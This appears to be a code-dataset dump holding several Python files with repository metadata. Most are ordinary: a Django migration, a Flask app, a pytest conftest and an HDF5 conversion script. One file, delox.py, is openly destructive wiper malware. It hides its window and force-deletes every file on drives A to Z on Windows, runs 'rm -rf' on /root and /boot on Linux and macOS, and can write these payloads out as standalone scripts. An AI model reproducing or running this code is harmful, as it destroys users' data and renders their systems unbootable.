0.103594
0.164905
0.215645
0.266385
0.221987
0.109937
0
0
0
0
0.014572
0.27668
759
28
79
27.107143
0.846995
0.349144
0
0.142857
1
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.071429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e7195e39c28378891f6a854d918f59f6617bb12b
1,126
py
Python
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
# Generated by Django 3.1.4 on 2020-12-14 13:44 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('projects', '0002_auto_20201202_1826'), ] operations = [ migrations.AlterField( model_name='project', name='closingDate', field=models.DateTimeField(blank=True, default=None, null=True), ), migrations.AlterField( model_name='project', name='creationDate', field=models.DateTimeField(auto_now_add=True), ), migrations.AlterField( model_name='project', name='members', field=models.ManyToManyField(blank=True, related_name='projects', to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='project', name='supervisors', field=models.ManyToManyField(blank=True, related_name='supervised_projects', to=settings.AUTH_USER_MODEL), ), ]
31.277778
118
0.624334
112
1,126
6.107143
0.473214
0.116959
0.146199
0.169591
0.47076
0.47076
0.263158
0
0
0
0
0.037576
0.267318
1,126
35
119
32.171429
0.791515
0.039964
0
0.413793
1
0
0.117702
0.021316
0
0
0
0
0
1
0
false
0
0.068966
0
0.172414
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e71d8640f648c91c132e793f9966b2f85d25064f
321
py
Python
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
from flask import Flask from flask import render_template import socket import os app = Flask(__name__) TARGET = os.environ.get('TARGET') @app.route("/") def main(): return render_template('target.html', name=socket.gethostname(), target=TARGET) if __name__ == "__main__": app.run(host="0.0.0.0", port=8080)
18.882353
83
0.713396
47
321
4.574468
0.510638
0.027907
0.139535
0
0
0
0
0
0
0
0
0.028881
0.137072
321
16
84
20.0625
0.747292
0
0
0
0
0
0.102804
0
0
0
0
0
0
1
0.090909
false
0
0.363636
0.090909
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e735da3f9351417bac702ec156eec7414c20e3c4
12,364
py
Python
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
import random from requests import get import socket import os , win32gui , win32con import getpass import time from init import banner from init.color import Color def ClearCSR(): os.system('clear') os.system('cls') def username(): getpass.getuser() def ip_local(): get('https://api.ipify.org').text def ip_public(): socket.gethostbyname(socket.gethostname()) def run(): ClearCSR() time.sleep(1) print(f''' ____ __ / __ \___ / /___ _ __ / / / / _ \/ / __ \| |/_/ / /_/ / __/ / /_/ /> < /_____/\___/_/\____/_/|_| programmer : One_Exploit' [*] -> onexploit@one_exploit.com' ''') systems = (''' [01] -> Windows [02] -> Linux [03] -> Os [04] -> Writer [99] -> exit ''') return systems print(run()) sys = int(input('one_exploit => ')) if sys == '01' or sys == '02' or sys == '03': print('Which one [1,2,3,99]') print(run()) def exits(): os.system('exit') print(''' ========= | By By | ========= ''') if sys == 1: while True: try: def delWindows(): listdrive = ['A', 'B' , 'C' ,'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'] time.sleep(1) ClearCSR() banner.Created_banner(Color.RED +'Windows') print() username() ip_local() password = input('your system have password?(Y , n) : ').lower() if password == 'Y': passnamesystem = getpass('Inter password '+username()+" : ") print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print(f'usename: {username()}') print(f'password: {passnamesystem}') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) for d in listdrive: driver = d os.system('del '+ driver + ':\*.* /f /s /q') # os.system('off') # os.system('attrib -r -g -h C:\\autoexec.bat') # os.system('del C:\\autoexec.bat') # os.system('attrib -r -g -h C:\\boot.ini') # os.system('del C:\\boot.ini') # os.system('attrib -r -g -h C:\\ntidr') # os.system('del C:\\ntidr') # os.system('attrib -r -g -h C:\windows\win.ini') # os.system('del 
C:\windows\win.ini') else: print(f'usename: {username()}') print('password: ') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) for d in listdrive: driver = d os.system('del '+ driver + ':\*.* /f /s /q') # os.system('off') # os.system('attrib -r -g -h C:\autoexec.bat') # os.system('del C:\autoexec.bat') # os.system('attrib -r -g -h C:\boot.ini') # os.system('del C:\boot.ini') # os.system('attrib -r -g -h C:\ntidr') # os.system('del C:\ntidr') # os.system('attrib -r -g -h C:\windows\win.ini') # os.system('del C:\windows\win.ini') print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') delWindows() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 2: while True: try: def delLinux(): time.sleep(1) os.system('clear') banner.Created_banner(Color.RED + 'Linux') password = input('your system have password?(Y , n) : ').lower() if password == 'y': passnamesystem = getpass('Inter password '+username()+" : ") print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print('We are One_Exploit') print(f'usename: {username()}') print(f'pass: {passnamesystem}') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) os.system('sudo su') os.system('echo '+passnamesystem) os.system('cp -r /home/'+username()+'/* /techer0221/') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') else: print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print('We are One_Exploit') print(f'usename: {username()}') print('password: ') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), 
win32con.SW_HIDE) os.system('sudo su') os.system('cp -r /home/'+username()+'/* /techer0221/') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') delLinux() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 3: while True: try: def delOs(): banner.Created_banner(Color.RED + 'MAC OS') ClearCSR() time.sleep(2) print('[*] -> your system deleted') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') delOs() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 4: while True: def Menu_Writer(): ClearCSR() banner.Created_banner('Write Delox') print('which one?') print(''' [1] -> Windows Write code Windows64 bit in new file for run. [2] -> Linux Write code Linux bit in new file for run. [3] -> Mac OS Write code MacOS in new file for run. 
[help] -> help ''') numbers = input('Enter Number: ') def Windows(): with open('init/main1.py', 'r') as mfile: with open('Windows.py', 'w') as file: file.writelines(mfile) file.close() def Linux(): with open('init/main2.py', 'r') as mfile: with open('Linux.py', 'w') as file: file.writelines(mfile) file.close() def MacOS(): with open('init/main3.py' , 'r') as osfile: with open('MacOS.py', 'w') as macOS: macOS.writelines(osfile) macOS.close() def Help(): Helping1 = ''' In this section, you can separate each executable file and save it in another file, for example, if you read Linux, it will copy the code in this tool for Linux in a new file and add it to the new file.\n \t \t \ if Do you went backed in first page write (Back) else Enter''' print(Helping1) if numbers == '1': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) Windows() input('Enter Anything.....') elif numbers == '2': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) 
Linux() input('Enter Anything.....') elif numbers == '3': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) MacOS() elif numbers == 'help' or numbers == 'Help' or numbers == '4': print(Color.RED + '[*] waiting.') print() # elif numbers == '99': # print(run()) Help() input1 = input('Enter Anything.....') if input1 == '' or input1 == 'Enter' or input1 == 'enter': Menu_Writer() elif input1 == 'back' or input1 == 'Back': print(run()) Menu_Writer() elif sys == 99: print('Good By') exits() elif sys == '': print(run())
42.342466
160
0.410789
1,333
12,364
3.765941
0.153038
0.084462
0.013147
0.087849
0.676892
0.646215
0.627291
0.620916
0.620916
0.620916
0
0.038451
0.406826
12,364
291
161
42.487973
0.646032
0.05419
0
0.592742
0
0.004032
0.263334
0.024866
0
0
0
0
0
1
0.056452
false
0.052419
0.032258
0
0.092742
0.245968
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e7392ab44027b89133d39ca29c9b3f1fd98daf39
1,156
py
Python
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
35
2018-04-10T13:54:27.000Z
2022-03-12T09:22:31.000Z
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
92
2018-03-19T10:14:18.000Z
2022-01-29T15:21:47.000Z
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
25
2018-03-16T23:14:42.000Z
2022-02-09T19:37:05.000Z
import os

import pytest
from six import string_types

from sonata.circuit.file import File


def _append_fdir(files):
    """Resolve *files* relative to this test module's directory.

    Accepts either a single path string or a list of path strings and
    returns the same shape with this file's directory prepended, so the
    example data can be found regardless of pytest's working directory.
    """
    fdir = os.path.dirname(os.path.realpath(__file__))
    if isinstance(files, string_types):
        return os.path.join(fdir, files)
    else:
        return [os.path.join(fdir, f) for f in files]


def load_circuit_files(data_files, data_type_files):
    """Build a sonata ``File`` from paths relative to this directory."""
    return File(data_files=_append_fdir(data_files),
                data_type_files=_append_fdir(data_type_files))


# Shared example circuit used by both fixtures below.  The two fixtures were
# previously identical copy-pasted bodies; they intentionally expose the same
# circuit under two names, so the file lists are factored out here.
_EXAMPLE_DATA_FILES = ['examples/v1_nodes.h5',
                       'examples/lgn_nodes.h5',
                       'examples/v1_v1_edges.h5']
_EXAMPLE_TYPE_FILES = ['examples/lgn_node_types.csv',
                       'examples/v1_node_types.csv',
                       'examples/v1_v1_edge_types.csv']


@pytest.fixture
def net():
    """Circuit fixture built from the v1/lgn example files."""
    return load_circuit_files(_EXAMPLE_DATA_FILES, _EXAMPLE_TYPE_FILES)


@pytest.fixture
def thalamocortical():
    """Alias fixture for the same example circuit as ``net``."""
    return load_circuit_files(_EXAMPLE_DATA_FILES, _EXAMPLE_TYPE_FILES)
37.290323
118
0.684256
162
1,156
4.518519
0.246914
0.10929
0.122951
0.125683
0.646175
0.51776
0.478142
0.478142
0.478142
0.478142
0
0.019417
0.198097
1,156
31
119
37.290323
0.770227
0
0
0.363636
0
0
0.252377
0.217805
0
0
0
0
0
1
0.181818
false
0
0.181818
0.136364
0.590909
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
2
e73a9a856eec52409b4256399bd7134cda02fe56
3,116
py
Python
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
11
2017-02-26T08:07:46.000Z
2022-03-01T06:22:09.000Z
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
null
null
null
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
4
2019-11-27T16:59:40.000Z
2021-12-06T21:21:07.000Z
# -*- coding: utf-8 -*-
# NOTE(review): this script is Python 2 (print statements, xrange, h5py's
# deprecated `.value` accessor) — keep running it under a py2 interpreter.
"""
Generates the outputs of an arbitrary CNN layer.
"""
__author__ = "Pau Rodríguez López, ISELAB, CVC-UAB"
__email__ = "pau.rodri1@gmail.com"

import argparse
import h5py
import cv2
import os
import numpy as np

# CLI: positional `flist` takes two values — the image root directory and a
# listing file with one "image label seq_num" triple per line.
parser = argparse.ArgumentParser(description="Reads a list of images, labels and sequences and outputs it into an h5")
parser.add_argument('flist', type=str, nargs=2, help="root path and file list with image<space>label<space>seq_num\n")
parser.add_argument('--subtract_mean', action='store_true', help='standarize data')
parser.add_argument('--output', type=str, help='output filename')
parser.add_argument('--size', type=int, default=0, help='resize images to size')
parser.add_argument('--standarize', action='store_true', help='whether to standarize the labels (useful for regression)')
parser.add_argument('--with_train', type=str, default='', help='standarize/mean test given the train.h5')
args = parser.parse_args()

print 'Reading flist'
with open(args.flist[1], 'r') as infile:
    data = infile.readlines()

# --size 0 (the default) means "use the first image's height as the size";
# only an explicit non-zero --size triggers resizing of every image.
if args.size == 0:
    sample = cv2.imread(os.path.join(args.flist[0], data[0].split(' ')[0]))
    args.size = sample.shape[0]  # assuming square images
    resize = False
else:
    resize = True

out = h5py.File(args.output, 'w')
# When --with_train points at an existing train.h5, its stored mean / label
# statistics are reused to normalize this (test) set instead of recomputing.
train = None
if os.path.exists(args.with_train):
    train = h5py.File(args.with_train, 'r')

# Pre-allocate the output datasets: NCHW image tensor, one label per image,
# and an int32 sequence id per image.
out.create_dataset('outputs', shape=(len(data), 3, args.size, args.size), dtype=float)
out.create_dataset('labels', shape=(len(data), 1), dtype=float)
out.create_dataset('seq_number', shape=(len(data), ), dtype='int32')

if train is None:
    mean_im = np.zeros((3,1,1))  # per-channel mean accumulator
else:
    mean_im = train['mean'][...]

print 'Reading and pre-processing images'
for i,d in enumerate(data):
    # NOTE(review): `dir` shadows the `dir` builtin; harmless here but worth
    # renaming if this loop is ever touched again.
    dir, label, seq = d.replace('\n', '').split(' ')
    im = cv2.imread(os.path.join(args.flist[0], dir))
    if resize:
        im = cv2.resize(im, dsize=(args.size, args.size), interpolation=cv2.INTER_CUBIC)
    # HWC (OpenCV) -> CHW float to match the 'outputs' dataset layout.
    im = im.transpose(2,0,1).astype('float')
    if args.subtract_mean and train is None:
        # Accumulate per-channel means now; subtraction happens in a second
        # pass after the full dataset mean is known.
        mean_im += im.mean(axis=(1,2))[:,None,None]
    elif train is not None:
        # Train statistics already known — subtract immediately.
        im -= mean_im
    out['outputs'][i,...] = im
    out['labels'][i,0] = float(label)
    out['seq_number'][i] = int(seq)
    if i % 100 == 0:
        print 100*i/float(len(data)), '%'
print '100 %'

# Second pass: finalize the mean and subtract it from every stored image,
# then persist it so a later --with_train run can reuse it.
if args.subtract_mean and train is None:
    mean_im /= len(data)
    for i in xrange(len(data)):
        out['outputs'][i,...] -= mean_im
    out['mean'] = mean_im

# Label normalization: reuse train stats if available, otherwise optionally
# standarize from this file's own labels, else store identity stats (0, 1).
if train is not None:
    # NOTE(review): Dataset.value is deprecated in h5py >= 2.1 — fine on the
    # pinned py2 stack, but use ds[()] if this is ever ported.
    label_mean = train['label_mean'].value
    label_std = train['label_std'].value
    out['label_mean'] = label_mean
    out['label_std'] = label_std
    out['labels'][:] -= label_mean
    out['labels'][:] /= label_std
elif args.standarize:
    out['label_mean'] = out['labels'][:].mean()
    out['label_std'] = out['labels'][:].std()
    out['labels'][:] = out['labels'][:] - out['label_mean']
    out['labels'][:] = out['labels'][:] / out['label_std']
else:
    out['label_mean'] = 0.
    out['label_std'] = 1.

out.close()
if train is not None:
    train.close()
print 'Done'
33.505376
121
0.656611
476
3,116
4.186975
0.294118
0.040642
0.051179
0.022579
0.156548
0.093327
0.067235
0.067235
0.038133
0.038133
0
0.017598
0.161104
3,116
93
122
33.505376
0.744836
0.014121
0
0.092105
1
0
0.2286
0.010949
0
0
0
0
0
0
null
null
0
0.065789
null
null
0.065789
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2